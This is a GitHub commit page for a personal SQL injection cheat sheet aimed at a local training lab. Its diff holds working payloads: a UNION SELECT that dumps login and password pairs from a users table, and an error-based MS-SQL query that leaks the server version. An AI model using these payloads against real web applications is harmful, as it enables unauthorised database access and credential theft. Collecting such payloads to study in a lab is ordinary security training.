Skip to content

Commit

Permalink
adding info to error based sqli - bare hands
Browse files Browse the repository at this point in the history
  • Loading branch information
UserXGnu committed Aug 29, 2018
1 parent 9a902d2 commit 4262baa
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion CheatSheets/SQLI/barehands/readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,9 @@ in one query
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**


#### Error Based SQLI
### Error Based SQLI (USUALLY MS-SQL)

#### DBMS version

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`

0 comments on commit 4262baa

Please sign in to comment.